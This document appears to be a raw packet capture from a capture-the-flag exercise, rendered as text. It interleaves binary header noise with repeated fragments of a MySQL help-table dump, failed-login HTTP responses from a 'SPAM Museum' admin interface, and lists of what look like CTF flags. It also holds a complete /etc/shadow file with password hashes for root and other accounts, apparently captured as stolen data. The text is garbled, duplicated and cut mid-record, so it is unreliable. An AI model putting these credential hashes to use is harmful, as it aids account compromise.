SQL_LOG_BIN = {0|1}\n\nDisables or enables binary logging for the current connection\n(SQL_LOG_BIN is a session variable)\nif the client connects using an account that has the SUPER privilege.\nThe statement is refused with an error if the client does not have that\nprivilege. (Before MySQL 4.1.2, the statement was simply ignored in that case.)\n','',''),(392,'!=',26,' <>\n !=\nNot equal:\n','mysql> SELECT \'.01\' <> \'0.01\';\n -> 1\nmysql> SELECT .01 <> \'0.01\';\n -> 0\nmysql> SELECT \'zapp\' <> \'zappp\';\n -> 1',''),(393,'AES_DECRYPT',17,' AES_ENCRYPT(str,key_str)\n AES_DECRYPT(crypt_str,key_str)\nThese functions allow encryption and decryption of data using the official\nAES (Advanced Encryption Standard) algorithm, previously known as \"Rijndael.\"\nEncoding with a 128-bit key length is used, but you can extend it up to\n256 bits by modifying the source. We chose 128 bits because it is much\nfaster and it is usually secure enoCk bb0`BiET@/Ԁo0SE 0.693147\nmysql> SELECT LN(-2);\n -> NULL',''),(390,'LOG',4,' LOG(X)\n LOG(B,X)\nIf called with one parameter, this function returns the natural logarithm\nof X.\n','mysql> SELECT LOG(2);\n -> 0.693147\nmysql> SELECT LOG(-2);\n -> NULL',''),(391,'SET SQL_LOG_BIN',6,'SET SQL_LOG_BIN = {0|1}\n\nDisables or enables binary logging for the current connection\n(SQL_LOG_BIN is a session variable)\nif the client connects using an account that has the SUPER privilege.\nThe statement is refused with an error if the client does not have that\nprivilege. (Before MySQL 4.1.2, the statement was simply ignored in that case.)\n','',''),(392,'!=',26,' <>\n !=\nNot equal:\n','mysql> SELECT \'.01\' <> \'0.01\';\n -> 1\nmysql> SELECT .01 <> \'0.01\';\n -> 0\nmysql> SELECT \'zapp\' <> \'zappp\';\n -> 1',''),(393,'AES_DECRYPT',17,' AES_ENCRYPT(str,key_str)\n AES_DECRYPT(crypt_str,key_str)\nThese functions allow encryption and decryption of data using the official\nAES (Advanced Encryption Standard) algorithm, previously known as \"Rijndael.\"\nEncoding with a 128-bit key length is used, but you can extend it up to\n256 bits by modifying the source. We chose 128 bits because it is much\nfaster and it is usually secure enoCƠ ZZBi0`EL@/Ao0E4#@?[  P:ԙ#!`| e' SELECT DAYNAME(\'1998-02-05\');\n -> \'Thursday\'',''),(395,'COERCIBILITY',25,' COERCIBILITY(str)\nReturns the collation coercibility value of the string argument.\n','mysql> SELECT COERCIBILITY(\'abc\' COLLATE latin1_swedish_ci);\n -> 0\nmysql> SELECT COERCIBILITY(USER());\n -> 3\nmysql> SELECT COERCIBILITY(\'abc\');\n -> 4',''),(396,'INT',1,' INT[(M)] [UNSIGNED] [ZEROFILL]\n\nA normal-size integer. The signed range is -2147483648 to\n2147483647. The unsigned range is 0 to 4294967295.\C ZZBi0`EL@/܂Sŀo0E4@? 3 P9'tu )Cأ bb0`BiET@/Ԁo0SE SELECT DAYNAME(\'1998-02-05\');\n -> \'Thursday\'',''),(395,'COERCIBILITY',25,' COERCIBILITY(str)\nReturns the collation coercibility value of the string argument.\n','mysql> SELECT COERCIBILITY(\'abc\' COLLATE latin1_swedish_ci);\n -> 0\nmysql> SELECT COERCIBILITY(USER());\n -> 3\nmysql> SELECT COERCIBILITY(\'abc\');\n -> 4',''),(396,'INT',1,' INT[(M)] [UNSIGNED] [ZEROFILL]\n\nA normal-size integer. The signed range is -2147483648 to\n2147483647. The unsigned range is 0 to 4294967295.\C ZZ0`BiEL@/go0AE4@@ 3 P9'tu )C Bi0`E@/Nlo0E @?  3P=*  y'HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

C 0`BiE@/Lo0SE @@  3P=*  y'HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

C bbBi0`ET@/p܂Ao0E SELECT \'Monty!\' REGEXP \'m%y%%\';\n -> 0\nmysql> SELECT \'Monty!\' REGEXP \'.*\';\n -> 1\nmysql> SELECT \'new*\\n*line\' REGEXP \'new\\\\*.\\\\*line\';\n -> 1\nmysql> SELECT \'a\' REGEXP \'A\', \'a\' REGEXP BINARY \'A\';\n -> 1 0\nmysql> SELECT \'a\' REGEXP \'^[a-d]\';\n -> 1',''),(398,'GLENGTH',18,' GLength(ls)\nReturns as a double-precision number the leC bb0`BiET@/Ԁo0SE SELECT \'Monty!\' REGEXP \'m%y%%\';\n -> 0\nmysql> SELECT \'Monty!\' REGEXP \'.*\';\n -> 1\nmysql> SELECT \'new*\\n*line\' REGEXP \'new\\\\*.\\\\*line\';\n -> 1\nmysql> SELECT \'a\' REGEXP \'A\', \'a\' REGEXP BINARY \'A\';\n -> 1 0\nmysql> SELECT \'a\' REGEXP \'^[a-d]\';\n -> 1',''),(398,'GLENGTH',18,' GLength(ls)\nReturns as a double-precision number the leC bbBi0`ET@/p܂Ao0E SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT GLength(GeomFromText(@ls));\n+----------------------------+\n| GLength(GeomFromText(@ls)) |\n+----------------------------+\n| 2.8284271247462 |\n+----------------------------+',''),(399,'RADIANS',4,' RADIANS(X)\nReturns the argument X, converted from degrees to radians.\n','mysql> SELECT RADIANS(90);\n -> 1.570796',''),(400,'COLLATION',25,' COLLATION(str)\nReturns the collation for the character set of the string argument.\n','mysql> SELECT COLLATION(\'abc\');\n -> \'latin1_swedish_ci\'\nmysql> SELECT COLLATION(_utf8\'abc\');\n -> \'utf8_general_ci\'',''),(401,'COALESCE',26,' COALESCE(value,...)\nReturns the first non-NULL value in the list.\n','mysql> SELECT COALESCE(NULL,1);\n -> 1\nmysql> SELECT COALESCE(NULL,NULL,NULL);\n -> NULL',''),(402,'VERSION',25,' VERSION()\nReturns a string that indicates the MySQL server version.\nAs of MySQL 4.1, the string has the utf8 character set.\n','mysql> SELECT VERSION();\n -> \'4.1.3-beta-log\'',''),(403,'MAKE_SET',23,' MAKE_SET(bits,str1,str2,...)\nReturns a set value (a string containing substrings separated by \',\'\ncharacters) cC bb0`BiET@/Ԁo0SE SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT GLength(GeomFromText(@ls));\n+----------------------------+\n| GLength(GeomFromText(@ls)) |\n+----------------------------+\n| 2.8284271247462 |\n+----------------------------+',''),(399,'RADIANS',4,' RADIANS(X)\nReturns the argument X, converted from degrees to radians.\n','mysql> SELECT RADIANS(90);\n -> 1.570796',''),(400,'COLLATION',25,' COLLATION(str)\nReturns the collation for the character set of the string argument.\n','mysql> SELECT COLLATION(\'abc\');\n -> \'latin1_swedish_ci\'\nmysql> SELECT COLLATION(_utf8\'abc\');\n -> \'utf8_general_ci\'',''),(401,'COALESCE',26,' COALESCE(value,...)\nReturns the first non-NULL value in the list.\n','mysql> SELECT COALESCE(NULL,1);\n -> 1\nmysql> SELECT COALESCE(NULL,NULL,NULL);\n -> NULL',''),(402,'VERSION',25,' VERSION()\nReturns a string that indicates the MySQL server version.\nAs of MySQL 4.1, the string has the utf8 character set.\n','mysql> SELECT VERSION();\n -> \'4.1.3-beta-log\'',''),(403,'MAKE_SET',23,' MAKE_SET(bits,str1,str2,...)\nReturns a set value (a string containing substrings separated by \',\'\ncharacters) cC ZZBi0`EL@/܂Sŀo0E4@? 3 PC'tc )C ZZ0`BiEL@/go0AE4@@ 3 PC'tc )Cֲ bbBi0`ET@/p܂Ao0E SELECT MAKE_SET(1,\'a\',\'b\',\'c\');\n -> \'a\'\nmysql> SELECT MAKE_SET(1 | 4,\'hello\',\'nice\',\'world\');\n -> \'hello,world\'\nmysql> SELECT MAKE_SET(1 | 4,\'hello\',\'nice\',NULL,\'world\');\n -> \'hello\'\nmysql> SELECT MAKE_SET(0,\'a\',\'b\',\'c\');\n -> \'\'',''),(404,'FIND_IN_SET',23,' FIND_IN_SET(str,strlist)\nReturns a value 1 to N if the string str is in the string list\nstrlist consisting of N substrings. A string list is a string\ncomposed of substrings separated by \',\' characters. If the first\nargument is a constant string and the second is a column of type SET,\nthe FIND_IN_SET() function is optimized to use bit arithmetic.\nReturns 0 if str is not in strlist or if strlist\nis the empty string. Returns NULL if either argument is NULL.\nThis function does not work properly if the first argument contains a comma\n(\',\') character.\n','mysql> SELECT FIND_IN_SET(\'b\',\'a,b,c,d\');\n -> 2',''); UNLOCK TABLES; /*!40000 ALTER TABLE `help_topic` ENABLE KEYS */; -- -- Table structure for table `host` -- DROP TABLE IF C bb0`BiET@/Ԁo0SE SELECT MAKE_SET(1,\'a\',\'b\',\'c\');\n -> \'a\'\nmysql> SELECT MAKE_SET(1 | 4,\'hello\',\'nice\',\'world\');\n -> \'hello,world\'\nmysql> SELECT MAKE_SET(1 | 4,\'hello\',\'nice\',NULL,\'world\');\n -> \'hello\'\nmysql> SELECT MAKE_SET(0,\'a\',\'b\',\'c\');\n -> \'\'',''),(404,'FIND_IN_SET',23,' FIND_IN_SET(str,strlist)\nReturns a value 1 to N if the string str is in the string list\nstrlist consisting of N substrings. A string list is a string\ncomposed of substrings separated by \',\' characters. If the first\nargument is a constant string and the second is a column of type SET,\nthe FIND_IN_SET() function is optimized to use bit arithmetic.\nReturns 0 if str is not in strlist or if strlist\nis the empty string. Returns NULL if either argument is NULL.\nThis function does not work properly if the first argument contains a comma\n(\',\') character.\n','mysql> SELECT FIND_IN_SET(\'b\',\'a,b,c,d\');\n -> 2',''); UNLOCK TABLES; /*!40000 ALTER TABLE `help_topic` ENABLE KEYS */; -- -- Table structure for table `host` -- DROP TABLE IF C: bbBi0`ET@/p܂Ao0E SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(EndPoint(GeomFromText(@ls)));\n+-------------------------------------+\n| AsText(EndPoint(GeomFromText(@ls))) |\n+-------------------------------------+\n| POINT(3 3) Cq bb0`BiET@/Ԁo0SE<@@w  3Ptj T  )ves.\n\nBy default, if neither QUICK nor EXTENDED is specified, MySQL\nreturns a live checksum if the table storage engine supports it and scans\nthe table otherwise.\n\nCHECKSUM TABLE returns NULL for non-existent tables.\nAs of MySQL 5.0.3, a warning is generated for this condition.\n\nThis statement is implemented in MySQL 4.1.1.\n\n\n @subsubsection OPTIMIZE TABLE Syntax\n\n\n\n\nOPTIMIZE [LOCAL | NO_WRITE_TO_BINLOG] TABLE tbl_name [, tbl_name] ...\n\nOPTIMIZE TABLE should be used if you have deleted a large part of a\ntable or if you have made many changes to a table with variable-length rows\n(tables that have VARCHAR, BLOB, or TEXT columns).\nDeleted records are maintained in a linked list and subsequent INSERT\noperations reuse old record positions. You can use OPTIMIZE TABLE to\nreclaim the unused space and to defragment the data file.\n','CHECKSUM TABLE tbl_name [, tbl_name] ... [ QUICK | EXTENDED ]',''),(73,'ENDPOINT',18,' EndPoint(ls)\nReturns the Point that is the end point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(EndPoint(GeomFromText(@ls)));\n+-------------------------------------+\n| AsText(EndPoint(GeomFromText(@ls))) |\n+-------------------------------------+\n| POINT(3 3) CO Bi0`E@/o+?o0E>޶  root:$1$uNwCQL3Q$JnPeD1BkAYUBvzdfQvU0l0:17874:0:99999:7::: daemon:*:12745:0:99999:7::: bin:*:12745:0:99999:7::: sys:*:12745:0:99999:7::: sync:*:12745:0:99999:7::: games:*:12745:0:99999:7::: man:*:12745:0:99999:7::: lp:*:12745:0:99999:7::: mail:*:12745:0:99999:7::: news:*:12745:0:99999:7::: uucp:*:12745:0:99999:7::: proxy:*:12745:0:99999:7::: www-data:*:12745:0:99999:7::: backup:*:12745:0:99999:7::: list:*:12745:0:99999:7::: irc:*:12745:0:99999:7::: gnats:*:12745:0:99999:7::: nobody:*:12745:0:99999:7::: Debian-exim:!:12745:0:99999:7::: identd:!:12745:0:99999:7::: sshd:!:12745:0:99999:7::: mysql:!:12751:0:99999:7::: foobar:$1$SUSKcx/j$LYYPzdu94fVYF0rhuR9nO/:12809:0:99999:7::: agent:$1$nTu4SIJA$TYWGCB7nO7VpGMgMS94nh.:12810:0:99999:7::: spammerd:!$1$k/dCLrgb$RGXSZn54WiCGAmwKbHWsq/:13122:0:99999:7::: ftp:!:13122:0:99999:7::: museum:$1$l25JxcZc$6O8DwBVK7xSDVEY8/w9HJ1:13122:0:99999:7::: spam:$1$HT8VX0iA$ctNYFaZVnW/nh6IF76vmN0:13122:0:99999:7::: aqs:$1$wxpxZwKC$ZuHITwaPyMEdPteaQkXwz0:13122:0:99999:7::: contribute:$1$r5jTi6QI$.lavlfaRrXIsPnIllxzU0.:13124:0:99999:7::: acquire:$1$/nDJ9YXL$LPhwqeKT3zR0rdVmfXvaZ0:13122:0:99999:7::: spamometer:$1$pp9MiALd$VwdixHwdXwTVmLqq4EhwB.:13122:0:99999:7::: spamagent:$1$mOUEpd5O$A9qLwPfeQG2DxL70wXuSS.:13123:0:99999:7::: spamdb:$1$cRjoLSNp$OhEJzJOXnsj5/worPlvP.1:13123:0:99999:7::: spamgen:$1$aF/RJxSr$w3jcT6tuJ33wlLnUaKQ/h0:13123:0:99999:7::: tomcat5:!:1Cj BaBiE@/o0o0 E@޴  root:$1$uNwCQL3Q$JnPeD1BkAYUBvzdfQvU0l0:17874:0:99999:7::: daemon:*:12745:0:99999:7::: bin:*:12745:0:99999:7::: sys:*:12745:0:99999:7::: sync:*:12745:0:99999:7::: games:*:12745:0:99999:7::: man:*:12745:0:99999:7::: lp:*:12745:0:99999:7::: mail:*:12745:0:99999:7::: news:*:12745:0:99999:7::: uucp:*:12745:0:99999:7::: proxy:*:12745:0:99999:7::: www-data:*:12745:0:99999:7::: backup:*:12745:0:99999:7::: list:*:12745:0:99999:7::: irc:*:12745:0:99999:7::: gnats:*:12745:0:99999:7::: nobody:*:12745:0:99999:7::: Debian-exim:!:12745:0:99999:7::: identd:!:12745:0:99999:7::: sshd:!:12745:0:99999:7::: mysql:!:12751:0:99999:7::: foobar:$1$SUSKcx/j$LYYPzdu94fVYF0rhuR9nO/:12809:0:99999:7::: agent:$1$nTu4SIJA$TYWGCB7nO7VpGMgMS94nh.:12810:0:99999:7::: spammerd:!$1$k/dCLrgb$RGXSZn54WiCGAmwKbHWsq/:13122:0:99999:7::: ftp:!:13122:0:99999:7::: museum:$1$l25JxcZc$6O8DwBVK7xSDVEY8/w9HJ1:13122:0:99999:7::: spam:$1$HT8VX0iA$ctNYFaZVnW/nh6IF76vmN0:13122:0:99999:7::: aqs:$1$wxpxZwKC$ZuHITwaPyMEdPteaQkXwz0:13122:0:99999:7::: contribute:$1$r5jTi6QI$.lavlfaRrXIsPnIllxzU0.:13124:0:99999:7::: acquire:$1$/nDJ9YXL$LPhwqeKT3zR0rdVmfXvaZ0:13122:0:99999:7::: spamometer:$1$pp9MiALd$VwdixHwdXwTVmLqq4EhwB.:13122:0:99999:7::: spamagent:$1$mOUEpd5O$A9qLwPfeQG2DxL70wXuSS.:13123:0:99999:7::: spamdb:$1$cRjoLSNp$OhEJzJOXnsj5/worPlvP.1:13123:0:99999:7::: spamgen:$1$aF/RJxSr$w3jcT6tuJ33wlLnUaKQ/h0:13123:0:99999:7::: tomcat5:!:1C bbBi0`ET@/,|po0E< =@?  P2?  {eNB432AE,ucsb,MTNzEwEDA43BMkiMLKfUVhOOrLfqpvNN49NoNw==
11B2D972BA428FF16CA85455F4C0B183,ucsb,MTNzEwEDA44OJnKLhCuGAw/zsSaAC9Yu63W5tw==
4BD48AFAEB4CC990FEC410F023B84B54,ucsb,MTNzEwEDA4/YnjqjV5RH0d9VUVFyNNk3Z47NXA==
D59ED0AA4C744348E292866F90F27388,ucsb,MTNzEwEDA5BWYbbMEa14tybiTEXq2YZT0e9GSQ==
7CF7908BCC76041A6CC22F402A00C80A,ucsb,MTNzEwEDA5E6DPG+zvW3C1R64Ldw7YY+uaU26w==
8D7CFD6E70069EE2D38AF4B9A7AF8F84,ucsb,MTNzEwEDA5LpDNzNpVGMJRSgYbvO9BZ0ehsfxA==
8F55138D61C4F29511ACB5F067A0B39D,ucsb,MTNzEwEDA5Mq0ZLGmkAelK1qAujGuw9t5p48LQ==
6E9CC189AA0E430BD1431E953E10CF15,ucsb,MTNzEwEDA5SlyZ/KKDk9sIR1G9sL8ah2K9z+TA==
461C2DF7FD2EBE280C5FD1811ADC393A,ucsb,MTNzEwEDA5WGF+MkfbOtsBs6TDZAJ0TXJq0bzQ==
692430DF5643F174B1E99D23B166A529,ucsb,MTNzEwEDA5aSnmESb6Bx1m4LF9ErGUMdHnYSwA==
1B337164609C6A26F158F9508CF191F5,ucsb,MTNzEwEDA5d8hG5x86vlEw01HfL/Sf67W/Y5hA==
471EA51FADD8A551CFE4CBD8A5F84E98,ucsb,MTNzEwEDA5iYnbcSXq7JtuVh8W3BuFU5x72JCQ==
FEE702B8DB03AB028DD5A72D087D922F,ucsb,MTNzEwEDA5kBJ3mNkYfT0cn7mhKgFtTnakUf+A==
3995C5AB66DE087955CF5970544B05E2,ucsb,MTNzEwEDA5oXeTVpcKuiTVUHhJSW92DpF2gOog==
3E3950428F18636E3FDAE9D05AD67B94,ucsb,MTNzEwEDA5tU1161KzYyMDV0762Kz5ng6Ur6CQ==
3A0E354DA7B465C15845F468A6E69EDA,ucsb,MTNzEwEDA5x7maW84JnWnd/kwulmnFjC bb0`BiET@/o0AE< =@@  P2?  {eNB432AE,ucsb,MTNzEwEDA43BMkiMLKfUVhOOrLfqpvNN49NoNw==
11B2D972BA428FF16CA85455F4C0B183,ucsb,MTNzEwEDA44OJnKLhCuGAw/zsSaAC9Yu63W5tw==
4BD48AFAEB4CC990FEC410F023B84B54,ucsb,MTNzEwEDA4/YnjqjV5RH0d9VUVFyNNk3Z47NXA==
D59ED0AA4C744348E292866F90F27388,ucsb,MTNzEwEDA5BWYbbMEa14tybiTEXq2YZT0e9GSQ==
7CF7908BCC76041A6CC22F402A00C80A,ucsb,MTNzEwEDA5E6DPG+zvW3C1R64Ldw7YY+uaU26w==
8D7CFD6E70069EE2D38AF4B9A7AF8F84,ucsb,MTNzEwEDA5LpDNzNpVGMJRSgYbvO9BZ0ehsfxA==
8F55138D61C4F29511ACB5F067A0B39D,ucsb,MTNzEwEDA5Mq0ZLGmkAelK1qAujGuw9t5p48LQ==
6E9CC189AA0E430BD1431E953E10CF15,ucsb,MTNzEwEDA5SlyZ/KKDk9sIR1G9sL8ah2K9z+TA==
461C2DF7FD2EBE280C5FD1811ADC393A,ucsb,MTNzEwEDA5WGF+MkfbOtsBs6TDZAJ0TXJq0bzQ==
692430DF5643F174B1E99D23B166A529,ucsb,MTNzEwEDA5aSnmESb6Bx1m4LF9ErGUMdHnYSwA==
1B337164609C6A26F158F9508CF191F5,ucsb,MTNzEwEDA5d8hG5x86vlEw01HfL/Sf67W/Y5hA==
471EA51FADD8A551CFE4CBD8A5F84E98,ucsb,MTNzEwEDA5iYnbcSXq7JtuVh8W3BuFU5x72JCQ==
FEE702B8DB03AB028DD5A72D087D922F,ucsb,MTNzEwEDA5kBJ3mNkYfT0cn7mhKgFtTnakUf+A==
3995C5AB66DE087955CF5970544B05E2,ucsb,MTNzEwEDA5oXeTVpcKuiTVUHhJSW92DpF2gOog==
3E3950428F18636E3FDAE9D05AD67B94,ucsb,MTNzEwEDA5tU1161KzYyMDV0762Kz5ng6Ur6CQ==
3A0E354DA7B465C15845F468A6E69EDA,ucsb,MTNzEwEDA5x7maW84JnWnd/kwulmnFjC bbBi0`ET@/,|po0E< >@?  P2?  {eN22RvpXw==
11A356FA0CF81369C9FFE82DFA68B662,ucsb,MTNzEwEDA51pEAS7FzjMNswuirvfXbAzwG7ykw==
13F3E03F4CBD9CB563A6A9D31786A290,ucsb,MTNzEwEDA55rcIH7gpCXo2Ay+8N05CQkHekE1Q==
368F78A83E6EF4D59C868A6D0D2FDF92,ucsb,MTNzEwEDA5+iHrvYbnjsVBR9ofQzj0ye0vSx2Q==
A291568A0283A27B4A163793B5E11FA6,ucsb,MTNzEwEDA6D/NUpF6k+WLRDduslhXF0igq6FLA==
6BF3BD7AF94C88A397F3C8A69C48D840,ucsb,MTNzEwEDA6FC+A9GY1oJGURvSnSSaWQ7SbQb9A==
61CC04D270CE2FA29751C85F10B90FF2,ucsb,MTNzEwEDA6I5OtXxB8mzfQaTh1AZ4pVcfAGcCw==
751104A9447655590C97DD2770AD1FC0,ucsb,MTNzEwEDA6Oe1cWZVNVWGd8ayEZP7r06BqqEPg==
F56885E23C7942A323394C586607DB91,ucsb,MTNzEwEDA6QRg9ZE2lsETrTkGC2YMEU1a+s8Aw==
89E477D2C5C18996C3C863767E9E9B5E,ucsb,MTNzEwEDA6UQCgmhCXwRwCByw/fpeECWsoRlhg==
342C1EBD29424E6AA3064BECDB8C537A,ucsb,MTNzEwEDA6b8uKzPDNo1pvYjzpmBdDk43UGbaQ==
318AE2E07EA58CCC4D29E60993765B78,ucsb,MTNzEwEDA6fTn5SQjGSZBOmW7VBwG7/sU/M5mQ==
F6759F5ED8D8AA796BE93A8A51E83493,ucsb,MTNzEwEDA6j4aIV5dzxWoA7d1cvK2DkPtVS+LA==
BF5C21B4633316A6CF19BA4A4C3F25A9,ucsb,MTNzEwEDA6mhpoPQdElDRDr5M+qf9558nP9Aow==
6590EEC4724E6E1EF8A6470762E49776,ucsb,MTNzEwEDA6oMcOaE7eUgIa+ppmQe8zmMYMrrEQ==
A1BA4979C8175962C6DF52AA16F74A07,ucsb,MTNzEwEDA6v4bxig4d9d0YzrN0oOqoDJdx14zQ==
836BB2103707D5569FDA84207C0D2C bb0`BiET@/o0AE< >@@  P2?  {eN22RvpXw==
11A356FA0CF81369C9FFE82DFA68B662,ucsb,MTNzEwEDA51pEAS7FzjMNswuirvfXbAzwG7ykw==
13F3E03F4CBD9CB563A6A9D31786A290,ucsb,MTNzEwEDA55rcIH7gpCXo2Ay+8N05CQkHekE1Q==
368F78A83E6EF4D59C868A6D0D2FDF92,ucsb,MTNzEwEDA5+iHrvYbnjsVBR9ofQzj0ye0vSx2Q==
A291568A0283A27B4A163793B5E11FA6,ucsb,MTNzEwEDA6D/NUpF6k+WLRDduslhXF0igq6FLA==
6BF3BD7AF94C88A397F3C8A69C48D840,ucsb,MTNzEwEDA6FC+A9GY1oJGURvSnSSaWQ7SbQb9A==
61CC04D270CE2FA29751C85F10B90FF2,ucsb,MTNzEwEDA6I5OtXxB8mzfQaTh1AZ4pVcfAGcCw==
751104A9447655590C97DD2770AD1FC0,ucsb,MTNzEwEDA6Oe1cWZVNVWGd8ayEZP7r06BqqEPg==
F56885E23C7942A323394C586607DB91,ucsb,MTNzEwEDA6QRg9ZE2lsETrTkGC2YMEU1a+s8Aw==
89E477D2C5C18996C3C863767E9E9B5E,ucsb,MTNzEwEDA6UQCgmhCXwRwCByw/fpeECWsoRlhg==
342C1EBD29424E6AA3064BECDB8C537A,ucsb,MTNzEwEDA6b8uKzPDNo1pvYjzpmBdDk43UGbaQ==
318AE2E07EA58CCC4D29E60993765B78,ucsb,MTNzEwEDA6fTn5SQjGSZBOmW7VBwG7/sU/M5mQ==
F6759F5ED8D8AA796BE93A8A51E83493,ucsb,MTNzEwEDA6j4aIV5dzxWoA7d1cvK2DkPtVS+LA==
BF5C21B4633316A6CF19BA4A4C3F25A9,ucsb,MTNzEwEDA6mhpoPQdElDRDr5M+qf9558nP9Aow==
6590EEC4724E6E1EF8A6470762E49776,ucsb,MTNzEwEDA6oMcOaE7eUgIa+ppmQe8zmMYMrrEQ==
A1BA4979C8175962C6DF52AA16F74A07,ucsb,MTNzEwEDA6v4bxig4d9d0YzrN0oOqoDJdx14zQ==
836BB2103707D5569FDA84207C0D2C bbBi0`ET@/p܂Ao0E<@?x  3P!tj C  )v |\n+-------------------------------------+',''),(74,'CACHE INDEX',6,'The CACHE INDEX statement assigns table indexes to a specific key\ncache. It is used only for MyISAM tables.\n\nThe following statement assigns indexes from the tables t1,\nt2, and t3 to the key cache named hot_cache:\n\nmysql> CACHE INDEX t1, t2, t3 IN hot_cache;\n+---------+--------------------+----------+----------+\n| Table | Op | Msg_type | Msg_text |\n+---------+--------------------+----------+----------+\n| test.t1 | assign_to_keycache | status | OK |\n| test.t2 | assign_to_keycache | status | OK |\n| test.t3 | assign_to_keycache | status | OK |\n+---------+--------------------+----------+----------+\n','CACHE INDEX\n tbl_index_list [, tbl_index_list] ...\n IN key_cache_name\n\ntbl_index_list:\n tbl_name [[INDEX|KEY] (index_name[, index_name] ...)]',''),(75,'COMPRESS',23,' COMPRESS(string_to_compress)\nCompresses a string. This function requires MySQL to have been compiled\nwith a compression library such as zlib. Otherwise, the return\nvalue is always NULL. The compressed string can be uncompressed with\nUNCOMPRESS().\n','mysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',1000)));\n -> 21\nmysql> SELECT LENGTH(COMPRESS(\'\'));\n ->C bb0`BiET@/Ԁo0SE<@@w  3P!tj C  )v |\n+-------------------------------------+',''),(74,'CACHE INDEX',6,'The CACHE INDEX statement assigns table indexes to a specific key\ncache. It is used only for MyISAM tables.\n\nThe following statement assigns indexes from the tables t1,\nt2, and t3 to the key cache named hot_cache:\n\nmysql> CACHE INDEX t1, t2, t3 IN hot_cache;\n+---------+--------------------+----------+----------+\n| Table | Op | Msg_type | Msg_text |\n+---------+--------------------+----------+----------+\n| test.t1 | assign_to_keycache | status | OK |\n| test.t2 | assign_to_keycache | status | OK |\n| test.t3 | assign_to_keycache | status | OK |\n+---------+--------------------+----------+----------+\n','CACHE INDEX\n tbl_index_list [, tbl_index_list] ...\n IN key_cache_name\n\ntbl_index_list:\n tbl_name [[INDEX|KEY] (index_name[, index_name] ...)]',''),(75,'COMPRESS',23,' COMPRESS(string_to_compress)\nCompresses a string. This function requires MySQL to have been compiled\nwith a compression library such as zlib. Otherwise, the return\nvalue is always NULL. The compressed string can be uncompressed with\nUNCOMPRESS().\n','mysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',1000)));\n -> 21\nmysql> SELECT LENGTH(COMPRESS(\'\'));\n ->C bbBi0`ET@/,|po0E< ?@?  P2?   |eQB8B,ucsb,MTNzEwEDA6xjVbCA802/ZdwIOqhl75Lr0fkidg==
6E4EEB7665478023BE00C89CF0C18B2F,ucsb,MTNzEwEDA63eSOZIYmhaoTMjKQgvbo0tgWH/eA==
362B41C6985C350DC5885B319C96E547,ucsb,MTNzEwEDA64yzykB2Ms/bap0iRFKGEuscaQqCQ==
09ACD3E37F2D745D0C41C821D575E1E8,ucsb,MTNzEwEDA6+Pv099jIiGbjoY3jUQCOu0iD6NIA==
E1E14354AEB86CB31F8B3DDD22149ACE,ucsb,MTNzEwEDA7A/ZjYyxnQLpGjOUZ2PZQnRQ0QvNw==
32F4AD1011B0EAAB6D6874A5A861E283,ucsb,MTNzEwEDA7FhZPk7yz/ie8Vd4nrBDbwdCAqY+A==
386C7DD91EF62D5F29494448EA6AFEA2,ucsb,MTNzEwEDA7KeFOLik/XE1prCAbluCUmI2pHPWg==
1379AFCB8FF45001B864D9AA622509E3,ucsb,MTNzEwEDA7OHhj+8yre3C+2VdhTq4hjCcD6suQ==
4BD65A723B4531D2B3051EEAD98DFF32,ucsb,MTNzEwEDA7QFLEQ710XjPtdLOWJkpMRAB3fGdQ==
00C1C2F6A9B45EB6A6CD2B202C7907ED,ucsb,MTNzEwEDA7UaNr9jbLfkcMRW9ex+dBp4cDI6bA==
FA7B8231CE6AAF3B4D2320B17EF4A7B9,ucsb,MTNzEwEDA7bVvSNKXnlXRAcbSsa356SzGpXi+A==
D0B0C8AB843C8C36DB6B56919359AF22,ucsb,MTNzEwEDA7dAAjfpLRTghUJCAYjmFinEPqFdCQ==
69DA79E2DB96475B15E13EB2450A766A,ucsb,MTNzEwEDA7jF6teWK0EU+gZSx5OWldT41KjPwg==
0D69194054F9176158CBE15E9FD58F8F,ucsb,MTNzEwEDA7lwK6lWMVW6TGg18aUOpIO6Y2azPA==
725850E55471006E85278D5299036F70,ucsb,MTNzEwEDA7oJML/ulblgIWjeNaz22ucEWchX+g==
0850B41B6D6F1A5409B1B4E970BB6D0A,ucsb,MTNzEwEDA7u6X0rnmFQBTVUrAntCjoOlpMC bb0`BiET@/o0AE< ?@@  P2?   |eQB8B,ucsb,MTNzEwEDA6xjVbCA802/ZdwIOqhl75Lr0fkidg==
6E4EEB7665478023BE00C89CF0C18B2F,ucsb,MTNzEwEDA63eSOZIYmhaoTMjKQgvbo0tgWH/eA==
362B41C6985C350DC5885B319C96E547,ucsb,MTNzEwEDA64yzykB2Ms/bap0iRFKGEuscaQqCQ==
09ACD3E37F2D745D0C41C821D575E1E8,ucsb,MTNzEwEDA6+Pv099jIiGbjoY3jUQCOu0iD6NIA==
E1E14354AEB86CB31F8B3DDD22149ACE,ucsb,MTNzEwEDA7A/ZjYyxnQLpGjOUZ2PZQnRQ0QvNw==
32F4AD1011B0EAAB6D6874A5A861E283,ucsb,MTNzEwEDA7FhZPk7yz/ie8Vd4nrBDbwdCAqY+A==
386C7DD91EF62D5F29494448EA6AFEA2,ucsb,MTNzEwEDA7KeFOLik/XE1prCAbluCUmI2pHPWg==
1379AFCB8FF45001B864D9AA622509E3,ucsb,MTNzEwEDA7OHhj+8yre3C+2VdhTq4hjCcD6suQ==
4BD65A723B4531D2B3051EEAD98DFF32,ucsb,MTNzEwEDA7QFLEQ710XjPtdLOWJkpMRAB3fGdQ==
